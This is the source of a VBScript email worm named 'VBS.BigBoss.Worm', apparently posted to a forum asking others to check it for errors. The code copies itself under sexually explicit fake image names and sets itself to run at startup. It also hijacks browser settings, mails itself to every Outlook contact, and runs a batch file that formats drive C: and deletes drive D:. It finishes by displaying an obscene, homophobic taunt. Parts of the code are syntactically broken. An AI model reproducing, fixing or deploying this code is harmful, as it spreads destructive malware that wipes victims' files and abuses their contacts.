' VBS.BigBoss.Worm

Set Boss=CreateObject("Scripting.FileSystemObject")
Boss.CopyFile Wscript.ScriptFullName, "C:\MY HOT NUDE SISTER!!! XXX.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\ANNAKOURNIKOVA IN SHOWER HOT XXX.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\AMUZING ASSFUCK FREE.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\56 YEAR OLD MAN FUCKING TEENS.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\TIGHT PUSSY SLICK.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\VERY BIG BOOBS PAMELA .JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\HOT TEEN LESBIANS!!!!.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\HUGE  IN MOUTH.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\BRITNEY GET FUCKED.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\CHRISTIAN & KEVIN BLOWJOB.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\DIRTY PUSSY .JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\AVRIL LAVIGNE PUSSYFUCK.JPG.vbs"
Boss.CopyFile Wscript.ScriptFullName, "C:\WINDOWS\SYSTEM\SYSTEM32.vbs"

Set Boss = CreateObject("WScript.Shell")
Boss.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BigBoss","C:\WINDOWS\SYSTEM\SYSTEM32.vbs"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FullScreen","yes"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations","no"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background","yes"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page","http://www.gay.com"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show_StatusBar","no"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show_ToolBar","no"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show_URLinStatusBar","no"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show_URLToolBar","no"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ShowGoButton","no"
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.gay.com
Boss.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\LinksFolderName","FREE GAYPORN"

Dim Boss
Set fso ="Scripting.FileSystem.Object"
Set so=CreateObject(fso)
Set ol=CreateObject("Outlook.Application")
Set out=WScript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For Boss=1 To a.AddressEntries.Count
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Boss)
Mail.Subject=" "
Mail.Body=" "
Mail.Attachments.Add Wscript.ScriptFullName
Mail.Send
ol.Quit

Dim xxx, Boss, shell
Set xxx=CreateObject("Scripting.FileSystemObject")
Set Boss=xxx.CreateTextFile("C:\BatBOSS.bat")
Boss.WriteLine "@ECHO OFF"
Boss.WriteLine "TIME 8:00"
Boss.WriteLine "FORMAT C: >> C:\AUTOEXEC.BAT"
Boss.WriteLine "DEL D:\*.*"
Boss.Close
shell.Run "C:\BatBOSS.bat"

Dim lol, Boss, shell
Set lol=CreateObject("Scripting.FileSystemObject")
Set Boss=lol.CreateTextFile("C:\BossMessage.txt")
Boss.WriteLine "    "
Boss.WriteLine "    "
Boss.WriteLine " FUCKING MOTHER FUCKER  YOU!!"
Boss.WriteLine " HAHAHA DIE ASSHOLE GAY!"
Boss.WriteLine "    "
Boss.WriteLine "    "
Boss.WriteLine "    "
Boss.WriteLine "    "
Boss.WriteLine "    "
Boss.WriteLine "    "
Boss.WriteLine "    "
Boss.WriteLine "VBS.BigBoss.Worm"
Boss.Close
shell.Run "C:\BossMessage.txt"


---

Please tell if you see any errors...  